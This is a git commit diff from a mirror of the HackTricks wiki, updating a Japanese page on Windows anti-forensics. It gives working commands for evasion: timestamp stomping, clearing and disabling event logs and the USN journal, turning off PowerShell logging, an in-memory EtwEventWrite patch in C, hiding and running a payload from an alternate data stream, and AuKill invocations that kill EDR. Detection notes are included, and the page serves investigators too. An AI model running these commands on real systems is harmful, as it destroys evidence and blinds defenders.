mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/generic-methodologies-and-resources/basic-forensic-meth
This commit is contained in:
parent
af348afdf1
commit
31a0ea14ff
@ -4,7 +4,7 @@
|
|||||||
|
|
||||||
## タイムスタンプ
|
## タイムスタンプ
|
||||||
|
|
||||||
攻撃者は、**ファイルのタイムスタンプを変更すること**に興味を持つかもしれません。\
|
攻撃者は**ファイルのタイムスタンプを変更すること**に興味を持つかもしれません。\
|
||||||
タイムスタンプは、MFT内の属性`$STANDARD_INFORMATION` \_\_ と \_\_ `$FILE_NAME`に見つけることができます。
|
タイムスタンプは、MFT内の属性`$STANDARD_INFORMATION` \_\_ と \_\_ `$FILE_NAME`に見つけることができます。
|
||||||
|
|
||||||
両方の属性には4つのタイムスタンプがあります: **変更**, **アクセス**, **作成**, および **MFTレジストリ変更** (MACEまたはMACB)。
|
両方の属性には4つのタイムスタンプがあります: **変更**, **アクセス**, **作成**, および **MFTレジストリ変更** (MACEまたはMACB)。
|
||||||
@ -13,11 +13,11 @@
|
|||||||
|
|
||||||
### TimeStomp - アンチフォレンジックツール
|
### TimeStomp - アンチフォレンジックツール
|
||||||
|
|
||||||
このツールは、**`$STANDARD_INFORMATION`** 内のタイムスタンプ情報を**変更**しますが、**`$FILE_NAME`** 内の情報は**変更しません**。したがって、**疑わしい** **活動を特定することが可能です**。
|
このツールは**`$STANDARD_INFORMATION`**内のタイムスタンプ情報を**変更**しますが、**`$FILE_NAME`**内の情報は**変更しません**。したがって、**疑わしい** **活動を特定することが可能です**。
|
||||||
|
|
||||||
### Usnjrnl
|
### Usnjrnl
|
||||||
|
|
||||||
**USNジャーナル** (Update Sequence Number Journal) は、NTFS (Windows NTファイルシステム) の機能で、ボリュームの変更を追跡します。[**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) ツールは、これらの変更を調査することを可能にします。
|
**USNジャーナル** (Update Sequence Number Journal)は、NTFS (Windows NTファイルシステム)の機能で、ボリュームの変更を追跡します。[**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv)ツールを使用すると、これらの変更を調査できます。
|
||||||
|
|
||||||
.png>)
|
.png>)
|
||||||
|
|
||||||
@ -31,7 +31,7 @@
|
|||||||
|
|
||||||
再び、ツールの出力では、**いくつかの変更が行われた**ことが確認できます。
|
再び、ツールの出力では、**いくつかの変更が行われた**ことが確認できます。
|
||||||
|
|
||||||
同じツールを使用して、**タイムスタンプが変更された時刻を特定することが可能です**:
|
同じツールを使用して、**タイムスタンプが変更された時刻を特定する**ことも可能です:
|
||||||
|
|
||||||
.png>)
|
.png>)
|
||||||
|
|
||||||
@ -46,7 +46,7 @@
|
|||||||
|
|
||||||
### ナノ秒
|
### ナノ秒
|
||||||
|
|
||||||
**NTFS** タイムスタンプは **100ナノ秒** の**精度**を持っています。したがって、2010-10-10 10:10:**00.000:0000 のようなタイムスタンプを持つファイルを見つけることは非常に疑わしいです。
|
**NTFS**のタイムスタンプは**100ナノ秒**の**精度**を持っています。したがって、2010-10-10 10:10:**00.000:0000のようなタイムスタンプを持つファイルを見つけることは非常に**疑わしい**です。
|
||||||
|
|
||||||
### SetMace - アンチフォレンジックツール
|
### SetMace - アンチフォレンジックツール
|
||||||
|
|
||||||
@ -56,7 +56,7 @@
|
|||||||
|
|
||||||
NFTSはクラスターと最小情報サイズを使用します。つまり、ファイルがクラスターと半分を占有している場合、**残りの半分はファイルが削除されるまで使用されません**。したがって、このスラックスペースに**データを隠すことが可能です**。
|
NFTSはクラスターと最小情報サイズを使用します。つまり、ファイルがクラスターと半分を占有している場合、**残りの半分はファイルが削除されるまで使用されません**。したがって、このスラックスペースに**データを隠すことが可能です**。
|
||||||
|
|
||||||
slackerのようなツールを使用すると、この「隠された」スペースにデータを隠すことができます。ただし、`$logfile` と `$usnjrnl` の分析により、いくつかのデータが追加されたことが示される可能性があります:
|
slackerのようなツールを使用すると、この「隠された」スペースにデータを隠すことができます。ただし、`$logfile`や`$usnjrnl`の分析により、いくつかのデータが追加されたことが示される可能性があります:
|
||||||
|
|
||||||
.png>)
|
.png>)
|
||||||
|
|
||||||
@ -64,12 +64,12 @@ slackerのようなツールを使用すると、この「隠された」スペ
|
|||||||
|
|
||||||
## UsbKill
|
## UsbKill
|
||||||
|
|
||||||
これは、**USB**ポートに変更が検出された場合にコンピュータを**シャットダウンする**ツールです。\
|
これは、USBポートに変更が検出された場合に**コンピュータをオフにする**ツールです。\
|
||||||
これを発見する方法は、実行中のプロセスを検査し、**実行中の各Pythonスクリプトをレビューする**ことです。
|
これを発見する方法は、実行中のプロセスを検査し、**実行中の各Pythonスクリプトをレビューする**ことです。
|
||||||
|
|
||||||
## ライブLinuxディストリビューション
|
## ライブLinuxディストリビューション
|
||||||
|
|
||||||
これらのディストリビューションは**RAM**メモリ内で**実行されます**。検出する唯一の方法は、**NTFSファイルシステムが書き込み権限でマウントされている場合**です。読み取り権限のみでマウントされている場合、侵入を検出することはできません。
|
これらのディストロは**RAMメモリ内で実行されます**。検出する唯一の方法は、**NTFSファイルシステムが書き込み権限でマウントされている場合**です。読み取り権限のみでマウントされている場合、侵入を検出することはできません。
|
||||||
|
|
||||||
## セキュア削除
|
## セキュア削除
|
||||||
|
|
||||||
@ -85,7 +85,7 @@ slackerのようなツールを使用すると、この「隠された」スペ
|
|||||||
|
|
||||||
UserAssistを無効にするには、2つのステップが必要です:
|
UserAssistを無効にするには、2つのステップが必要です:
|
||||||
|
|
||||||
1. 2つのレジストリキー `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` と `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled` をゼロに設定して、UserAssistを無効にしたいことを示します。
|
1. 2つのレジストリキー、`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs`と`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`をゼロに設定して、UserAssistを無効にしたいことを示します。
|
||||||
2. `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`のようなレジストリサブツリーをクリアします。
|
2. `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`のようなレジストリサブツリーをクリアします。
|
||||||
|
|
||||||
### タイムスタンプの無効化 - Prefetch
|
### タイムスタンプの無効化 - Prefetch
|
||||||
@ -98,21 +98,21 @@ UserAssistを無効にするには、2つのステップが必要です:
|
|||||||
- 各々の値を1(または3)から0に変更するために修正を選択
|
- 各々の値を1(または3)から0に変更するために修正を選択
|
||||||
- 再起動
|
- 再起動
|
||||||
|
|
||||||
### タイムスタンプの無効化 - 最後のアクセス時間
|
### タイムスタンプの無効化 - 最終アクセス時刻
|
||||||
|
|
||||||
NTFSボリュームからフォルダーが開かれるたびに、システムは**各リストされたフォルダーのタイムスタンプフィールドを更新するための時間を取ります**。これは、重度に使用されるNTFSボリュームではパフォーマンスに影響を与える可能性があります。
|
NTFSボリュームからフォルダーが開かれるたびに、システムは**各リストされたフォルダーのタイムスタンプフィールドを更新するための時間を取ります**。これは、NTFSボリュームが頻繁に使用される場合、パフォーマンスに影響を与える可能性があります。
|
||||||
|
|
||||||
1. レジストリエディタ (Regedit.exe) を開きます。
|
1. レジストリエディタを開く (Regedit.exe)。
|
||||||
2. `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`に移動します。
|
2. `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`に移動します。
|
||||||
3. `NtfsDisableLastAccessUpdate`を探します。存在しない場合は、このDWORDを追加し、その値を1に設定してプロセスを無効にします。
|
3. `NtfsDisableLastAccessUpdate`を探します。存在しない場合は、このDWORDを追加し、その値を1に設定してプロセスを無効にします。
|
||||||
4. レジストリエディタを閉じ、サーバーを再起動します。
|
4. レジストリエディタを閉じ、サーバーを再起動します。
|
||||||
|
|
||||||
### USB履歴の削除
|
### USB履歴の削除
|
||||||
|
|
||||||
すべての**USBデバイスエントリ**は、USBデバイスをPCまたはラップトップに接続するたびに作成されるサブキーを含む**USBSTOR**レジストリキーの下にWindowsレジストリに保存されます。このキーはここにあります `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**これを削除することで**、USB履歴を削除します。\
|
すべての**USBデバイスエントリ**は、USBデバイスをPCまたはノートパソコンに接続するたびに作成されるサブキーを含む**USBSTOR**レジストリキーの下にWindowsレジストリに保存されます。このキーはここにあります`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**これを削除することで**、USB履歴を削除します。\
|
||||||
また、[**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html)ツールを使用して、削除したことを確認することもできます(および削除するために)。
|
また、[**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html)ツールを使用して、削除したことを確認することもできます(および削除するために)。
|
||||||
|
|
||||||
USBに関する情報を保存する別のファイルは、`C:\Windows\INF` 内の `setupapi.dev.log` です。これも削除する必要があります。
|
USBに関する情報を保存する別のファイルは、`C:\Windows\INF`内の`setupapi.dev.log`ファイルです。これも削除する必要があります。
|
||||||
|
|
||||||
### シャドウコピーの無効化
|
### シャドウコピーの無効化
|
||||||
|
|
||||||
@ -127,22 +127,22 @@ GUIを介して削除することも可能で、[https://www.ubackup.com/windows
|
|||||||
2. リストから「Volume Shadow Copy」を見つけて選択し、右クリックしてプロパティにアクセスします。
|
2. リストから「Volume Shadow Copy」を見つけて選択し、右クリックしてプロパティにアクセスします。
|
||||||
3. 「スタートアップの種類」ドロップダウンメニューから「無効」を選択し、変更を適用してOKをクリックして確認します。
|
3. 「スタートアップの種類」ドロップダウンメニューから「無効」を選択し、変更を適用してOKをクリックして確認します。
|
||||||
|
|
||||||
どのファイルがシャドウコピーにコピーされるかの設定をレジストリ `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` で変更することも可能です。
|
シャドウコピーでコピーされるファイルの構成を変更することも可能で、レジストリ`HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`で設定できます。
|
||||||
|
|
||||||
### 削除されたファイルの上書き
|
### 削除されたファイルの上書き
|
||||||
|
|
||||||
- **Windowsツール**を使用できます: `cipher /w:C` これは、Cドライブ内の未使用のディスクスペースからデータを削除するようにcipherに指示します。
|
- **Windowsツール**を使用できます:`cipher /w:C` これは、Cドライブ内の未使用のディスクスペースからデータを削除するようにcipherに指示します。
|
||||||
- [**Eraser**](https://eraser.heidi.ie)のようなツールを使用することもできます。
|
- [**Eraser**](https://eraser.heidi.ie)のようなツールを使用することもできます。
|
||||||
|
|
||||||
### Windowsイベントログの削除
|
### Windowsイベントログの削除
|
||||||
|
|
||||||
- Windows + R --> eventvwr.msc --> 「Windowsログ」を展開 --> 各カテゴリを右クリックして「ログのクリア」を選択
|
- Windows + R --> eventvwr.msc --> "Windows Logs"を展開 --> 各カテゴリを右クリックして「ログのクリア」を選択
|
||||||
- `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
|
- `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
|
||||||
- `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
|
- `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
|
||||||
|
|
||||||
### Windowsイベントログの無効化
|
### Windowsイベントログの無効化
|
||||||
|
|
||||||
- `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
|
- `reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\eventlog' /v Start /t REG_DWORD /d 4 /f`
|
||||||
- サービスセクション内で「Windows Event Log」サービスを無効にします。
|
- サービスセクション内で「Windows Event Log」サービスを無効にします。
|
||||||
- `WEvtUtil.exec clear-log`または`WEvtUtil.exe cl`
|
- `WEvtUtil.exec clear-log`または`WEvtUtil.exe cl`
|
||||||
|
|
||||||
@ -150,4 +150,68 @@ GUIを介して削除することも可能で、[https://www.ubackup.com/windows
|
|||||||
|
|
||||||
- `fsutil usn deletejournal /d c:`
|
- `fsutil usn deletejournal /d c:`
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 高度なログ記録とトレース改ざん (2023-2025)
|
||||||
|
|
||||||
|
### PowerShell ScriptBlock/Module Logging
|
||||||
|
|
||||||
|
最近のWindows 10/11およびWindows Serverのバージョンは、`Microsoft-Windows-PowerShell/Operational` (イベント4104/4105/4106)の下に**リッチなPowerShellフォレンジックアーティファクト**を保持します。攻撃者は、これらをオンザフライで無効にしたり消去したりすることができます:
|
||||||
|
```powershell
|
||||||
|
# Turn OFF ScriptBlock & Module logging (registry persistence)
|
||||||
|
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine" \
|
||||||
|
-Name EnableScriptBlockLogging -Value 0 -PropertyType DWord -Force
|
||||||
|
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging" \
|
||||||
|
-Name EnableModuleLogging -Value 0 -PropertyType DWord -Force
|
||||||
|
|
||||||
|
# In-memory wipe of recent PowerShell logs
|
||||||
|
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' |
|
||||||
|
Remove-WinEvent # requires admin & Win11 23H2+
|
||||||
|
```
|
||||||
|
防御者は、これらのレジストリキーの変更と大量のPowerShellイベントの削除を監視するべきです。
|
||||||
|
|
||||||
|
### ETW (Event Tracing for Windows) パッチ
|
||||||
|
|
||||||
|
エンドポイントセキュリティ製品はETWに大きく依存しています。2024年の人気の回避方法は、メモリ内で`ntdll!EtwEventWrite`/`EtwEventWriteFull`をパッチして、すべてのETW呼び出しがイベントを発生させることなく`STATUS_SUCCESS`を返すようにすることです。
|
||||||
|
```c
|
||||||
|
// 0xC3 = RET on x64
|
||||||
|
unsigned char patch[1] = { 0xC3 };
|
||||||
|
WriteProcessMemory(GetCurrentProcess(),
|
||||||
|
GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite"),
|
||||||
|
patch, sizeof(patch), NULL);
|
||||||
|
```
|
||||||
|
Public PoCs (e.g. `EtwTiSwallow`) は PowerShell または C++ で同じプリミティブを実装しています。
|
||||||
|
パッチが **プロセスローカル** であるため、他のプロセス内で実行されている EDR はこれを見逃す可能性があります。
|
||||||
|
検出: メモリ内の `ntdll` とディスク上の `ntdll` を比較するか、ユーザーモードの前にフックします。
|
||||||
|
|
||||||
|
### Alternate Data Streams (ADS) 復活
|
||||||
|
|
||||||
|
2023年のマルウェアキャンペーン(例: **FIN12** ローダー)では、従来のスキャナーの視界から外れるために、ADS 内に第二段階のバイナリをステージングしているのが確認されています:
|
||||||
|
```cmd
|
||||||
|
rem Hide cobalt.bin inside an ADS of a PDF
|
||||||
|
type cobalt.bin > report.pdf:win32res.dll
|
||||||
|
rem Execute directly
|
||||||
|
wmic process call create "cmd /c report.pdf:win32res.dll"
|
||||||
|
```
|
||||||
|
ストリームを列挙するには、`dir /R`、`Get-Item -Stream *`、またはSysinternalsの`streams64.exe`を使用します。ホストファイルをFAT/exFATにコピーするか、SMB経由でコピーすると、隠しストリームが削除され、調査者がペイロードを回復するのに使用できます。
|
||||||
|
|
||||||
|
### BYOVD & “AuKill” (2023)
|
||||||
|
|
||||||
|
Bring-Your-Own-Vulnerable-Driverは、ランサムウェア侵入における**アンチフォレンジック**に現在一般的に使用されています。オープンソースツール**AuKill**は、署名されたが脆弱なドライバー(`procexp152.sys`)をロードして、暗号化およびログ破壊**の前に**EDRおよびフォレンジックセンサーを一時停止または終了させます。
|
||||||
|
```cmd
|
||||||
|
AuKill.exe -e "C:\\Program Files\\Windows Defender\\MsMpEng.exe"
|
||||||
|
AuKill.exe -k CrowdStrike
|
||||||
|
```
|
||||||
|
ドライバーはその後削除され、最小限のアーティファクトが残ります。
|
||||||
|
緩和策:Microsoftの脆弱なドライバーブロックリスト(HVCI/SAC)を有効にし、ユーザーが書き込み可能なパスからのカーネルサービスの作成に警告します。
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 参考文献
|
||||||
|
|
||||||
|
- Sophos X-Ops – “AuKill: A Weaponized Vulnerable Driver for Disabling EDR” (2023年3月)
|
||||||
|
https://news.sophos.com/en-us/2023/03/07/aukill-a-weaponized-vulnerable-driver-for-disabling-edr
|
||||||
|
- Red Canary – “Patching EtwEventWrite for Stealth: Detection & Hunting” (2024年6月)
|
||||||
|
https://redcanary.com/blog/etw-patching-detection
|
||||||
|
|
||||||
{{#include ../../banners/hacktricks-training.md}}
|
{{#include ../../banners/hacktricks-training.md}}
|
||||||
|
Loading…
x
Reference in New Issue
Block a user